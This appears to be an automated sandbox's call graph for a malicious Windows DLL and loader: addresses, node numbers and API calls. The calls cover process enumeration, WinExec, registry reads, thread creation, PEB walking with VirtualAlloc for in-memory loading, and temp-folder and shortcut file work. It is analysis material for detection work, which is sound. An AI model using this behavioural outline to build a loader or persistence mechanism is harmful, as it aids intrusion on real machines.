_Yarn 71624->71630 71628 6ca9aa0e 3 API calls 71625->71628 71627 6ca9aa0e 3 API calls 71626->71627 71627->71630 71628->71630 71629->71619 71629->71620 71629->71622 71633 6ca989c9 71629->71633 71636 6ca980f0 CreateToolhelp32Snapshot 71629->71636 71652 6ca98330 41 API calls 3 library calls 71630->71652 71632 6caa3a5e 29 API calls 71634 6ca98a23 71632->71634 71633->71632 71635 6ca989f8 std::ios_base::_Ios_base_dtor 71633->71635 71637 6ca9810c __fread_nolock 71636->71637 71638 6ca98303 71636->71638 71639 6ca98122 Process32FirstW 71637->71639 71638->71629 71640 6ca982fc CloseHandle 71639->71640 71648 6ca98146 std::ios_base::_Ios_base_dtor _Yarn _strlen 71639->71648 71640->71638 71641 6ca98150 WideCharToMultiByte 71641->71648 71642 6ca9831d 71653 6ca826c0 30 API calls 3 library calls 71642->71653 71644 6ca98322 71645 6caa3a5e 29 API calls 71644->71645 71647 6ca98327 71645->71647 71646 6ca9aa0e RaiseException EnterCriticalSection LeaveCriticalSection 71646->71648 71648->71641 71648->71642 71648->71644 71648->71646 71649 6ca98310 CloseHandle 71648->71649 71650 6ca982e2 Process32NextW 71648->71650 71649->71638 71650->71640 71650->71641 71651->71620 71652->71633 71653->71644 71654 6ca9d159 71655 6ca9d162 71654->71655 71656 6ca9d167 71654->71656 71671 6ca9d17c GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 71655->71671 71660 6ca9d04e 71656->71660 71661 6ca9d05a ___scrt_is_nonwritable_in_current_image 71660->71661 71662 6ca9d083 dllmain_raw 71661->71662 71667 6ca9d07e __DllMainCRTStartup@12 71661->71667 71668 6ca9d069 71661->71668 71663 6ca9d09d dllmain_crt_dispatch 71662->71663 71662->71668 71663->71667 71663->71668 71664 6ca9d0ef 71665 6ca9d0f8 dllmain_crt_dispatch 71664->71665 71664->71668 71666 6ca9d10b dllmain_raw 71665->71666 71665->71668 71666->71668 71667->71664 71672 6ca9cf22 119 API calls 4 library calls 71667->71672 71670 6ca9d0e4 dllmain_raw 71670->71664 71671->71656 71672->71670 71673 6ca9403b 71679 6ca94049 std::ios_base::_Ios_base_dtor 71673->71679 71674 6ca94d58 71675 6caa3a5e 29 API calls 71674->71675 71676 6ca94d5d 71675->71676 71706 6ca826c0 30 API calls 3 library calls 71676->71706 71678 6ca94d69 71707 6ca826c0 30 API calls 3 library calls 71678->71707 71679->71674 71680 6ca9416b WinExec 71679->71680 71682 6ca9aa0e 3 API calls 71680->71682 71684 6ca94197 71682->71684 71683 6ca94d75 71708 6ca826c0 30 API calls 3 library calls 71683->71708 71704 6ca95e30 30 API calls 2 library calls 71684->71704 71687 6ca94d81 71709 6ca826c0 30 API calls 3 library calls 71687->71709 71689 6ca94d8d 71710 6ca826c0 30 API calls 3 library calls 71689->71710 71691 6ca94204 71691->71674 71705 6ca8b390 30 API calls 2 library calls 71691->71705 71692 6ca94d99 71711 6ca826c0 30 API calls 3 library calls 71692->71711 71695 6ca94da5 71712 6ca826c0 30 API calls 3 library calls 71695->71712 71697 6ca94db1 71713 6ca826c0 30 API calls 3 library calls 71697->71713 71699 6ca94dbd 71714 6ca826c0 30 API calls 3 library calls 71699->71714 71701 6ca94dc9 71715 6ca826c0 30 API calls 3 library calls 71701->71715 71703 6ca94dd5 71704->71691 71705->71691 71706->71678 71707->71683 71708->71687 71709->71689 71710->71692 71711->71695 71712->71697 71713->71699 71714->71701 71715->71703 71716 10005eb2 Sleep 71719 10006f17 71716->71719 71721 10006f21 71719->71721 71720 10006e83 _malloc 66 API calls 71720->71721 71721->71720 71722 10005ec9 71721->71722 71725 10006f3d std::exception::exception 71721->71725 71731 10008550 DecodePointer 71721->71731 71724 10006f7b 71733 10006e24 66 API calls std::exception::operator= 71724->71733 71725->71724 71732 100073e9 76 API calls __cinit 71725->71732 71727 10006f85 71734 10007836 RaiseException 71727->71734 71730 10006f96 71731->71721 71732->71724 71733->71727 71734->71730 71735 10006013 71736 10006045 71735->71736 71737 10020003 71736->71737 71740 1000608a 71736->71740 71743 10005e07 71736->71743 71741 100060a0 RegOpenKeyExW 71740->71741 71742 10003f35 __wcsrev 71741->71742 71744 1001f0f9 RegQueryValueExW 71743->71744 71745 10003f35 __wcsrev 71744->71745 71746 10004274 71747 1001f814 CreateThread 71746->71747 71749 10006110 71747->71749 71749->71749 71750 c70032 71760 c70ae4 GetPEB 71750->71760 71753 c70ae4 GetPEB 71756 c702a7 71753->71756 71754 c704a6 GetNativeSystemInfo 71755 c704d3 VirtualAlloc 71754->71755 71758 c70a02 71754->71758 71757 c704ec 71755->71757 71756->71754 71756->71758 71757->71757 71762 10007813 71757->71762 71761 c7029b 71760->71761 71761->71753 71763 10007823 71762->71763 71764 1000781e 71762->71764 71768 1000771d 71763->71768 71776 1000b54b GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 71764->71776 71767 10007831 71767->71758 71769 10007729 _doexit 71768->71769 71773 10007776 71769->71773 71774 100077c6 _doexit 71769->71774 71777 100075b9 71769->71777 71771 100077a6 71772 100075b9 __CRT_INIT@12 149 API calls 71771->71772 71771->71774 71772->71774 71773->71771 71773->71774 71775 100075b9 __CRT_INIT@12 149 API calls 71773->71775 71774->71767 71775->71771 71776->71763 71778 100075c5 _doexit 71777->71778 71779 10007647 71778->71779 71780 100075cd 71778->71780 71782 100076a8 71779->71782 71785 1000764d 71779->71785 71828 1000803b HeapCreate 71780->71828 71783 100076ad 71782->71783 71786 10007706 71782->71786 71787 10009754 ___set_flsgetvalue 3 API calls 71783->71787 71784 100075d2 71795 100075d6 _doexit 71784->71795 71847 10009ac6 86 API calls 5 library calls 71784->71847 71788 1000766b 71785->71788 71785->71795 71853 10008306 66 API calls _doexit 71785->71853 71786->71795 71859 10009a58 79 API calls __freefls@4 71786->71859 71790 100076b2 71787->71790 71793 1000767f 71788->71793 71854 1000b0e4 67 API calls _free 71788->71854 71796 10009fe4 __calloc_crt 66 API calls 71790->71796 71857 10007692 70 API calls __mtterm 71793->71857 71795->71773 71799 100076be 71796->71799 71797 100075e2 __RTC_Initialize 71800 100075e6 71797->71800 71806 100075f2 GetCommandLineA 71797->71806 71799->71795 71803 100076ca DecodePointer 71799->71803 71848 10008059 HeapDestroy 71800->71848 71801 10007675 71855 100097a5 70 API calls _free 71801->71855 71810 100076df 71803->71810 71805 1000767a 71856 10008059 HeapDestroy 71805->71856 71829 1000b468 71 API calls 2 library calls 71806->71829 71807 100075eb 71807->71795 71812 100076e3 71810->71812 71813 100076fa 71810->71813 71811 10007602 71830 1000ae9f 73 API calls __calloc_crt 71811->71830 71814 100097e2 __getptd_noexit 66 API calls 71812->71814 71858 10006e49 66 API calls 2 library calls 71813->71858 71817 100076ea GetCurrentThreadId 71814->71817 71817->71795 71818 1000760c 71819 10007610 71818->71819 71850 1000b3ad 95 API calls 3 library calls 71818->71850 71849 100097a5 70 API calls _free 71819->71849 71822 1000761c 71823 10007630 71822->71823 71831 1000b137 71822->71831 71823->71807 71852 1000b0e4 67 API calls _free 71823->71852 71828->71784 71829->71811 71830->71818 71832 1000b140 71831->71832 71834 1000b145 _strlen 71831->71834 71860 1000de61 94 API calls __setmbcp 71832->71860 71835 10009fe4 __calloc_crt 66 API calls 71834->71835 71838 10007625 71834->71838 71840 1000b17a _strlen 71835->71840 71836 1000b1c9 71862 10006e49 66 API calls 2 library calls 71836->71862 71838->71823 71851 10008119 77 API calls 4 library calls 71838->71851 71839 10009fe4 __calloc_crt 66 API calls 71839->71840 71840->71836 71840->71838 71840->71839 71841 1000b1ef 71840->71841 71844 1000b206 71840->71844 71861 10007f48 66 API calls 2 library calls 71840->71861 71863 10006e49 66 API calls 2 library calls 71841->71863 71864 100086b0 10 API calls __call_reportfault 71844->71864 71846 1000b212 71847->71797 71848->71807 71849->71800 71850->71822 71851->71823 71852->71819 71853->71788 71854->71801 71855->71805 71856->71793 71857->71795 71858->71795 71859->71795 71860->71834 71861->71840 71862->71838 71863->71838 71864->71846 71865 6cab0bfe CreateFileW 71866 6ca93d3e 71867 6ca9aa0e 3 API calls 71866->71867 71868 6ca93d47 _Yarn 71867->71868 71869 6ca91070 131 API calls 71868->71869 71872 6ca93daa std::ios_base::_Ios_base_dtor 71869->71872 71870 6ca93df7 Sleep 71871 6ca9aa0e 3 API calls 71870->71871 71873 6ca93e2e 71871->71873 71872->71870 71874 6ca94d58 71872->71874 71900 6ca95e30 30 API calls 2 library calls 71873->71900 71875 6caa3a5e 29 API calls 71874->71875 71877 6ca94d5d 71875->71877 71902 6ca826c0 30 API calls 3 library calls 71877->71902 71879 6ca94d69 71903 6ca826c0 30 API calls 3 library calls 71879->71903 71881 6ca93eba 71881->71874 71901 6ca8b390 30 API calls 2 library calls 71881->71901 71883 6ca94d75 71904 6ca826c0 30 API calls 3 library calls 71883->71904 71885 6ca94d81 71905 6ca826c0 30 API calls 3 library calls 71885->71905 71887 6ca94d8d 71906 6ca826c0 30 API calls 3 library calls 71887->71906 71889 6ca94d99 71907 6ca826c0 30 API calls 3 library calls 71889->71907 71891 6ca94da5 71908 6ca826c0 30 API calls 3 library calls 71891->71908 71893 6ca94db1 71909 6ca826c0 30 API calls 3 library calls 71893->71909 71895 6ca94dbd 71910 6ca826c0 30 API calls 3 library calls 71895->71910 71897 6ca94dc9 71911 6ca826c0 30 API calls 3 library calls 71897->71911 71899 6ca94dd5 71900->71881 71901->71881 71902->71879 71903->71883 71904->71885 71905->71887 71906->71889 71907->71891 71908->71893 71909->71895 71910->71897 71911->71899 71912 6ca8a8b0 71913 6ca8a930 _Yarn 71912->71913 71914 6ca8a8cd _Yarn 71912->71914 71914->71913 71915 6ca8aa4b 71914->71915 71916 6caa4922 __fread_nolock 45 API calls 71914->71916 71915->71913 71918 6caa4922 71915->71918 71916->71914 71921 6caa4885 71918->71921 71923 6caa4891 ___scrt_is_nonwritable_in_current_image 71921->71923 71922 6caa48c9 71922->71913 71923->71922 71924 6caa48db 71923->71924 71925 6caa48a4 __fread_nolock 71923->71925 71934 6caa00a9 EnterCriticalSection 71924->71934 71949 6caa2f04 14 API calls __dosmaperr 71925->71949 71927 6caa48e5 71935 6caa493f 71927->71935 71930 6caa48be 71950 6caa3a4e 29 API calls ___std_exception_copy 71930->71950 71934->71927 71938 6caa4951 __fread_nolock 71935->71938 71942 6caa48fc 71935->71942 71936 6caa495e 71973 6caa2f04 14 API calls __dosmaperr 71936->71973 71938->71936 71938->71942 71947 6caa49af 71938->71947 71939 6caa4963 71974 6caa3a4e 29 API calls ___std_exception_copy 71939->71974 71951 6caa491a LeaveCriticalSection __fread_nolock 71942->71951 71943 6caa4ada __fread_nolock 72043 6caa2f04 14 API calls __dosmaperr 71943->72043 71945 6caaf3a2 __fread_nolock 29 API calls 71945->71947 71947->71942 71947->71943 71947->71945 71952 6cab1ceb 71947->71952 71975 6caa4804 29 API calls 4 library calls 71947->71975 71976 6cab21f6 71947->71976 71949->71930 71950->71922 71951->71922 71953 6cab1cf6 71952->71953 71954 6cab1d03 71953->71954 71958 6cab1d1b 71953->71958 72074 6caa2f04 14 API calls __dosmaperr 71954->72074 71956 6cab1d08 72075 6caa3a4e 29 API calls ___std_exception_copy 71956->72075 71959 6cab1d7a 71958->71959 71960 6cab3cff __fread_nolock 14 API calls 71958->71960 71967 6cab1d13 71958->71967 71961 6caaf3a2 __fread_nolock 29 API calls 71959->71961 71960->71959 71962 6cab1d93 71961->71962 72044 6cab20dd 71962->72044 71965 6caaf3a2 __fread_nolock 29 API calls 71966 6cab1dcc 71965->71966 71966->71967 71968 6caaf3a2 __fread_nolock 29 API calls 71966->71968 71967->71947 71969 6cab1dda 71968->71969 71969->71967 71970 6caaf3a2 __fread_nolock 29 API calls 71969->71970 71971 6cab1de8 71970->71971 71972 6caaf3a2 __fread_nolock 29 API calls 71971->71972 71972->71967 71973->71939 71974->71942 71975->71947 71977 6cab2208 71976->71977 71978 6cab2220 71976->71978 72087 6caa2f17 14 API calls __dosmaperr 71977->72087 71980 6cab2562 71978->71980 71985 6cab2263 71978->71985 72106 6caa2f17 14 API calls __dosmaperr 71980->72106 71981 6cab220d 72088 6caa2f04 14 API calls __dosmaperr 71981->72088 71984 6cab2567 72107 6caa2f04 14 API calls __dosmaperr 71984->72107 71987 6cab226e 71985->71987 71990 6cab2215 71985->71990 71992 6cab229e 71985->71992 72089 6caa2f17 14 API calls __dosmaperr 71987->72089 71988 6cab227b 72108 6caa3a4e 29 API calls ___std_exception_copy 71988->72108 71990->71947 71991 6cab2273 72090 6caa2f04 14 API calls __dosmaperr 71991->72090 71995 6cab22b7 71992->71995 71996 6cab22f2 71992->71996 71997 6cab22c4 71992->71997 71995->71997 72002 6cab22e0 71995->72002 72094 6caaa641 15 API calls 2 library calls 71996->72094 72091 6caa2f17 14 API calls __dosmaperr 71997->72091 72001 6cab22c9 72092 6caa2f04 14 API calls __dosmaperr 72001->72092 72005 6cab71c6 __fread_nolock 29 API calls 72002->72005 72003 6cab2303 72095 6caaa607 14 API calls __dosmaperr 72003->72095 72008 6cab243e 72005->72008 72007 6cab22d0 72093 6caa3a4e 29 API calls ___std_exception_copy 72007->72093 72011 6cab24b2 72008->72011 72014 6cab2457 GetConsoleMode 72008->72014 72009 6cab230c 72096 6caaa607 14 API calls __dosmaperr 72009->72096 72013 6cab24b6 ReadFile 72011->72013 72016 6cab252a GetLastError 72013->72016 72017 6cab24ce 72013->72017 72014->72011 72018 6cab2468 72014->72018 72015 6cab2313 72019 6cab2338 72015->72019 72020 6cab231d 72015->72020 72021 6cab248e 72016->72021 72022 6cab2537 72016->72022 72017->72016 72034 6cab24a7 72017->72034 72018->72013 72023 6cab246e ReadConsoleW 72018->72023 72099 6caafcdb 31 API calls 2 library calls 72019->72099 72097 6caa2f04 14 API calls __dosmaperr 72020->72097 72024 6cab22db __fread_nolock 72021->72024 72100 6caa2f2a 14 API calls __dosmaperr 72021->72100 72104 6caa2f04 14 API calls __dosmaperr 72022->72104 72029 6cab2488 GetLastError 72023->72029 72023->72034 72101 6caaa607 14 API calls __dosmaperr 72024->72101 72029->72021 72031 6cab2322 72098 6caa2f17 14 API calls __dosmaperr 72031->72098 72032 6cab253c 72105 6caa2f17 14 API calls __dosmaperr 72032->72105 72033 6cab2346 72033->72002 72034->72024 72037 6cab250a 72034->72037 72038 6cab24f3 72034->72038 72037->72024 72039 6cab2523 72037->72039 72102 6cab25ff 34 API calls 3 library calls 72038->72102 72103 6cab28a3 32 API calls __fread_nolock 72039->72103 72042 6cab232d 72042->72024 72043->71939 72045 6cab20e9 ___scrt_is_nonwritable_in_current_image 72044->72045 72046 6cab20f1 72045->72046 72049 6cab210c 72045->72049 72077 6caa2f17 14 API calls __dosmaperr 72046->72077 72048 6cab20f6 72078 6caa2f04 14 API calls __dosmaperr 72048->72078 72050 6cab2123 72049->72050 72053 6cab215e 72049->72053 72079 6caa2f17 14 API calls __dosmaperr 72050->72079 72055 6cab217c 72053->72055 72056 6cab2167 72053->72056 72054 6cab2128 72080 6caa2f04 14 API calls __dosmaperr 72054->72080 72076 6cab7171 EnterCriticalSection 72055->72076 72082 6caa2f17 14 API calls __dosmaperr 72056->72082 72060 6cab2182 72063 6cab21a1 72060->72063 72064 6cab21b6 72060->72064 72061 6cab2130 72081 6caa3a4e 29 API calls ___std_exception_copy 72061->72081 72062 6cab216c 72083 6caa2f04 14 API calls __dosmaperr 72062->72083 72084 6caa2f04 14 API calls __dosmaperr 72063->72084 72068 6cab21f6 __fread_nolock 41 API calls 72064->72068 72070 6cab21b1 72068->72070 72069 6cab21a6 72085 6caa2f17 14 API calls __dosmaperr 72069->72085 72086 6cab21ee LeaveCriticalSection __wsopen_s 72070->72086 72073 6cab1d9b 72073->71965 72073->71967 72074->71956 72075->71967 72076->72060 72077->72048 72078->72073 72079->72054 72080->72061 72081->72073 72082->72062 72083->72061 72084->72069 72085->72070 72086->72073 72087->71981 72088->71990 72089->71991 72090->71988 72091->72001 72092->72007 72093->72024 72094->72003 72095->72009 72096->72015 72097->72031 72098->72042 72099->72033 72100->72024 72101->71990 72102->72024 72103->72042 72104->72032 72105->72024 72106->71984 72107->71988 72108->71990 72109 6ca8aa90 72110 6ca8aab3 _Yarn 72109->72110 72111 6ca8ab8d _Yarn 72109->72111 72111->72110 72112 6caa4c68 69 API calls 72111->72112 72112->72110 72113 6ca99b10 72161 6ca81a30 72113->72161 72115 6ca99b45 72183 6ca993e0 GetModuleFileNameA 72115->72183 72117 6ca99bae _Yarn 72206 6ca97590 72117->72206 72118 6ca99b5b _strlen 72118->72117 72561 6ca82c20 39 API calls 3 library calls 72118->72561 72121 6ca99f77 72125 6caa3a5e 29 API calls 72121->72125 72122 6ca99c0b std::ios_base::_Ios_base_dtor 72122->72121 72155 6ca99da2 std::ios_base::_Ios_base_dtor 72122->72155 72235 6ca97eb0 72122->72235 72123 6ca99e27 CreateThread 72126 6ca99e40 WaitForSingleObject 72123->72126 72127 6ca99eb3 72123->72127 73185 6ca980e0 Sleep 72123->73185 72130 6ca99f7c 72125->72130 72126->72127 72131 6ca99e55 CloseHandle 72126->72131 72291 6ca996a0 GetModuleFileNameA 72127->72291 72129 6ca99cbd 72134 6ca993e0 31 API calls 72129->72134 72135 6ca829d0 29 API calls 72130->72135 72136 6ca99e64 72131->72136 72140 6ca99e83 std::ios_base::_Ios_base_dtor 72131->72140 72133 6ca99dfd CreateThread 72133->72123 72143 6ca99cc9 _strlen 72134->72143 72139 6ca99f8f 72135->72139 72136->72121 72136->72140 72137 6ca99ed8 72317 6ca992f0 GetModuleFileNameA 72137->72317 72142 6ca99eeb 72328 6ca96410 72142->72328 72153 6ca99d0b std::ios_base::_Ios_base_dtor _Yarn 72143->72153 72562 6ca82c20 39 API calls 3 library calls 72143->72562 72146 6ca99f04 72345 6ca999f0 72146->72345 72151 6ca99f2c 72370 6ca87e80 GetTempPathA 72151->72370 72153->72121 72243 6caa5185 72153->72243 72155->72121 72155->72123 72256 6ca98a70 72155->72256 72563 6caa3ef1 GetSystemTimeAsFileTime 72161->72563 72163 6ca81a64 72565 6caa5147 72163->72565 72168 6caa5159 39 API calls 72169 6ca81abf 72168->72169 72571 6ca81c70 72169->72571 72172 6ca81b08 72173 6ca81b78 72172->72173 72584 6ca81000 72172->72584 72602 6caa33d3 72172->72602 72610 6ca818c0 72172->72610 72633 6caa3423 29 API calls 2 library calls 72172->72633 72175 6ca81bb4 std::ios_base::_Ios_base_dtor 72173->72175 72176 6caa3a5e 29 API calls 72173->72176 72175->72115 72177 6ca81bdb 72176->72177 72634 6ca81c00 29 API calls std::ios_base::_Ios_base_dtor 72177->72634 72181 6ca81bef 72181->72115 72182 6ca81b67 Sleep 72182->72172 72182->72173 72184 6ca9943f _strlen 72183->72184 72185 6ca9944a 72184->72185 72186 6ca9965e 72184->72186 72189 6ca99488 72185->72189 72190 6ca994ac 72185->72190 72198 6ca99451 _Yarn 72185->72198 72733 6ca826c0 30 API calls 3 library calls 72186->72733 72188 6ca99663 72734 6ca826c0 30 API calls 3 library calls 72188->72734 72191 6ca9aa0e 3 API calls 72189->72191 72192 6ca9aa0e 3 API calls 72190->72192 72191->72198 72192->72198 72194 6caa3a5e 29 API calls 72195 6ca99674 72194->72195 72196 6ca829d0 29 API calls 72195->72196 72197 6ca9968f 72196->72197 72197->72118 72198->72188 72200 6ca9954a 72198->72200 72205 6ca9954f _Yarn 72198->72205 72199 6ca9958c std::ios_base::_Ios_base_dtor 72199->72118 72201 6ca995de 72200->72201 72202 6ca995be 72200->72202 72200->72205 72204 6ca9aa0e 3 API calls 72201->72204 72203 6ca9aa0e 3 API calls 72202->72203 72203->72205 72204->72205 72205->72194 72205->72199 72207 6ca975e4 72206->72207 72735 6ca8c580 72207->72735 72209 6ca975f8 72234 6ca97697 std::ios_base::_Ios_base_dtor 72209->72234 72754 6ca97880 72209->72754 72212 6ca8a100 72 API calls 72214 6ca977de std::ios_base::_Ios_base_dtor 72212->72214 72214->72122 72216 6ca97671 72220 6ca976cb 72216->72220 72221 6ca976e4 72216->72221 72225 6ca97676 __fread_nolock 72216->72225 72217 6ca97812 72796 6ca826c0 30 API calls 3 library calls 72217->72796 72219 6ca97817 72223 6caa3a5e 29 API calls 72219->72223 72224 6ca9aa0e 3 API calls 72220->72224 72222 6ca9aa0e 3 API calls 72221->72222 72222->72225 72226 6ca9781c 72223->72226 72224->72225 72779 6ca97ca0 75 API calls CallUnexpected 72225->72779 72797 6ca8a050 72 API calls std::ios_base::_Ios_base_dtor 72226->72797 72229 6ca97838 72229->72122 72230 6ca9773c 72231 6ca97799 72230->72231 72232 6ca9774b 72230->72232 72780 6ca89b70 72231->72780 72232->72219 72232->72234 72234->72212 72923 6ca86eb0 72235->72923 72237 6ca97f15 std::ios_base::_Ios_base_dtor 72238 6ca97fae std::ios_base::_Ios_base_dtor 72237->72238 72239 6caa3a5e 29 API calls 72237->72239 72238->72129 72240 6ca97fdc 72239->72240 72241 6ca829d0 29 API calls 72240->72241 72242 6ca97fef 72241->72242 72242->72129 72244 6caa519d 72243->72244 72245 6caa5193 72243->72245 72247 6caa51ef __wsopen_s 39 API calls 72244->72247 72246 6cab357e 16 API calls 72245->72246 72248 6caa519a 72246->72248 72249 6caa51b7 72247->72249 72248->72155 72250 6ca9f7f4 __wsopen_s 17 API calls 72249->72250 72251 6caa51c4 72250->72251 73077 6ca96110 72256->73077 72258 6ca98b24 72261 6ca98b70 std::ios_base::_Ios_base_dtor _Yarn 72258->72261 73088 6ca82c20 39 API calls 3 library calls 72258->73088 72260 6caa3a5e 29 API calls 72262 6ca991ef 72260->72262 72263 6ca98cd1 GetFileAttributesA 72261->72263 72266 6ca99163 std::ios_base::_Ios_base_dtor 72261->72266 73092 6ca826c0 30 API calls 3 library calls 72262->73092 72265 6ca98ce1 SHGetFolderPathA 72263->72265 72263->72266 72265->72266 72271 6ca98cfd _strlen 72265->72271 72266->72260 72268 6ca991c5 std::ios_base::_Ios_base_dtor 72266->72268 72267 6ca991fb 72269 6ca829d0 29 API calls 72267->72269 72268->72133 72270 6ca99212 72269->72270 72270->72133 72271->72262 72272 6ca98d8d 72271->72272 72273 6ca98d6e 72271->72273 72276 6ca98d2a _Yarn 72271->72276 72275 6ca9aa0e 3 API calls 72272->72275 72274 6ca9aa0e 3 API calls 72273->72274 72274->72276 72275->72276 72278 6ca98e04 72276->72278 73089 6ca82c20 39 API calls 3 library calls 72276->73089 72280 6ca98eac _Yarn 72278->72280 73090 6ca82c20 39 API calls 3 library calls 72278->73090 72282 6ca98f4d std::ios_base::_Ios_base_dtor 72280->72282 73091 6ca82c20 39 API calls 3 library calls 72280->73091 72282->72266 72283 6ca99091 GetFileAttributesA 72282->72283 72283->72266 72284 6ca990a1 CoInitialize CoCreateInstance 72283->72284 72285 6ca990c9 MultiByteToWideChar 72284->72285 72286 6ca9915d CoUninitialize 72284->72286 72289 6ca99103 72285->72289 72286->72266 72288 6ca9914b 72288->72286 72289->72288 72290 6ca99126 MultiByteToWideChar 72289->72290 72290->72288 72292 6ca996ff _strlen 72291->72292 72293 6ca9970a 72292->72293 72294 6ca9999f 72292->72294 72297 6ca99748 72293->72297 72298 6ca99766 72293->72298 72304 6ca99711 _Yarn 72293->72304 73094 6ca826c0 30 API calls 3 library calls 72294->73094 72296 6ca999a4 72299 6ca85880 30 API calls 72296->72299 72300 6ca9aa0e 3 API calls 72297->72300 72301 6ca9aa0e 3 API calls 72298->72301 72302 6ca999b0 72299->72302 72300->72304 72301->72304 73095 6ca826c0 30 API calls 3 library calls 72302->73095 72304->72296 72308 6ca99877 72304->72308 72316 6ca998b9 std::ios_base::_Ios_base_dtor 72304->72316 72305 6caa3a5e 29 API calls 72306 6ca999c1 72305->72306 72307 6ca829d0 29 API calls 72306->72307 72309 6ca999df 72307->72309 72308->72302 72310 6ca99896 72308->72310 72309->72137 72311 6ca99926 72310->72311 72312 6ca99906 72310->72312 72315 6ca9989d _Yarn 72310->72315 72314 6ca9aa0e 3 API calls 72311->72314 72313 6ca9aa0e 3 API calls 72312->72313 72313->72315 72314->72315 72315->72305 72315->72316 72316->72137 72318 6ca9932b _strlen 72317->72318 72319 6ca993ce 72318->72319 72320 6ca99336 72318->72320 73096 6ca826c0 30 API calls 3 library calls 72319->73096 72323 6ca9936e 72320->72323 72324 6ca99397 72320->72324 72327 6ca9933d _Yarn 72320->72327 72322 6ca993d3 72325 6ca9aa0e 3 API calls 72323->72325 72326 6ca9aa0e 3 API calls 72324->72326 72325->72327 72326->72327 72327->72142 72329 6ca96434 _strlen 72328->72329 72330 6ca964c9 72329->72330 72331 6ca9643f 72329->72331 73097 6ca826c0 30 API calls 3 library calls 72330->73097 72333 6ca96497 72331->72333 72334 6ca96477 72331->72334 72337 6ca96446 _Yarn 72331->72337 72336 6ca9aa0e 3 API calls 72333->72336 72335 6ca9aa0e 3 API calls 72334->72335 72335->72337 72336->72337 72337->72146 72338 6ca964f9 std::ios_base::_Ios_base_dtor 72338->72146 72339 6ca964ce 72339->72338 72340 6caa3a5e 29 API calls 72339->72340 72342 6ca9652c 72340->72342 72341 6ca96559 std::ios_base::_Ios_base_dtor 72341->72146 72342->72341 72343 6caa3a5e 29 API calls 72342->72343 72344 6ca96592 72343->72344 72346 6ca99a09 GetModuleHandleA 72345->72346 72347 6ca99a07 72345->72347 72348 6ca99a1b __fread_nolock 72346->72348 72349 6ca99a85 72346->72349 72347->72346 72350 6ca99a2c GetModuleFileNameA 72348->72350 72361 6ca829d0 72349->72361 72350->72349 72351 6ca99a43 _strlen 72350->72351 72352 6ca99b01 72351->72352 72353 6ca99a65 72351->72353 73098 6ca826c0 30 API calls 3 library calls 72352->73098 72356 6ca99aca 72353->72356 72357 6ca99ab3 72353->72357 72360 6ca99a6c _Yarn 72353->72360 72355 6ca99b06 72359 6ca9aa0e 3 API calls 72356->72359 72358 6ca9aa0e 3 API calls 72357->72358 72358->72360 72359->72360 72360->72349 72362 6ca829dc 72361->72362 72363 6ca82a03 std::ios_base::_Ios_base_dtor 72361->72363 72362->72363 72364 6caa3a5e 29 API calls 72362->72364 72363->72151 72365 6ca82a26 _Yarn 72364->72365 72366 6ca82b92 std::ios_base::_Ios_base_dtor 72365->72366 72367 6caa3a5e 29 API calls 72365->72367 72366->72151 72368 6ca82bdf 72367->72368 72369 6ca829d0 29 API calls 72368->72369 72373 6ca87ef7 _strlen 72370->72373 72371 6ca895b7 73124 6ca826c0 30 API calls 3 library calls 72371->73124 72373->72371 72374 6ca87f49 72373->72374 72375 6ca87f60 72373->72375 72381 6ca87f09 _Yarn 72373->72381 72377 6ca9aa0e 3 API calls 72374->72377 72378 6ca9aa0e 3 API calls 72375->72378 72376 6ca895bc 73125 6ca826c0 30 API calls 3 library calls 72376->73125 72377->72381 72378->72381 72387 6ca87fe0 72381->72387 73105 6ca82c20 39 API calls 3 library calls 72381->73105 72389 6ca8b880 130 API calls 72387->72389 72398 6ca88074 std::ios_base::_Ios_base_dtor 72389->72398 72561->72117 72562->72153 72564 6caa3f2a __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 72563->72564 72564->72163 72635 6caaa893 GetLastError 72565->72635 72568 6caa5159 72569 6caaa893 __Getctype 39 API calls 72568->72569 72570 6ca81a9c 72569->72570 72570->72168 72572 6ca81ccb 72571->72572 72573 6ca81de5 72571->72573 72575 6ca81ce2 72572->72575 72576 6ca81d24 72572->72576 72582 6ca81cfe _Yarn 72572->72582 72671 6ca81df0 30 API calls 2 library calls 72573->72671 72575->72573 72577 6ca81cee 72575->72577 72578 6ca9aa0e 3 API calls 72576->72578 72580 6ca9aa0e 3 API calls 72577->72580 72578->72582 72579 6caa3a5e 29 API calls 72581 6ca81def 72579->72581 72580->72582 72582->72579 72583 6ca81db3 std::ios_base::_Ios_base_dtor 72582->72583 72583->72172 72585 6ca81039 72584->72585 72586 6ca8100d 72584->72586 72672 6ca811b0 72585->72672 72586->72585 72588 6ca811b0 39 API calls 72586->72588 72588->72586 72589 6ca81136 72590 6ca81169 72589->72590 72592 6ca811b0 39 API calls 72589->72592 72591 6ca811b0 39 API calls 72590->72591 72593 6ca81178 72591->72593 72592->72589 72594 6ca811b0 39 API calls 72593->72594 72596 6ca8118a 72594->72596 72595 6ca811b0 39 API calls 72601 6ca81048 72595->72601 72682 6ca815d0 72596->72682 72599 6ca811b0 39 API calls 72600 6ca811a2 72599->72600 72600->72172 72601->72589 72601->72595 72603 6caa33df ___scrt_is_nonwritable_in_current_image 72602->72603 72705 6caa3d46 EnterCriticalSection 72603->72705 72605 6caa33e6 72706 6caa3691 72605->72706 72611 6ca818e7 72610->72611 72612 6ca8193c 72611->72612 72613 6ca81b16 72611->72613 72615 6caa5159 39 API calls 72612->72615 72625 6ca819a2 72612->72625 72614 6ca818c0 95 API calls 72613->72614 72618 6ca81000 75 API calls 72613->72618 72623 6caa33d3 28 API calls 72613->72623 72731 6caa3423 29 API calls 2 library calls 72613->72731 72616 6ca81b67 Sleep 72614->72616 72617 6ca81978 72615->72617 72616->72613 72624 6ca81b78 72616->72624 72619 6caa5159 39 API calls 72617->72619 72618->72613 72621 6ca81984 72619->72621 72620 6ca9aa82 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 72622 6ca81a1f 72620->72622 72621->72625 72627 6ca81c70 30 API calls 72621->72627 72622->72182 72623->72613 72626 6ca81bb4 std::ios_base::_Ios_base_dtor 72624->72626 72628 6caa3a5e 29 API calls 72624->72628 72625->72620 72626->72182 72627->72625 72630 6ca81bdb 72628->72630 72732 6ca81c00 29 API calls 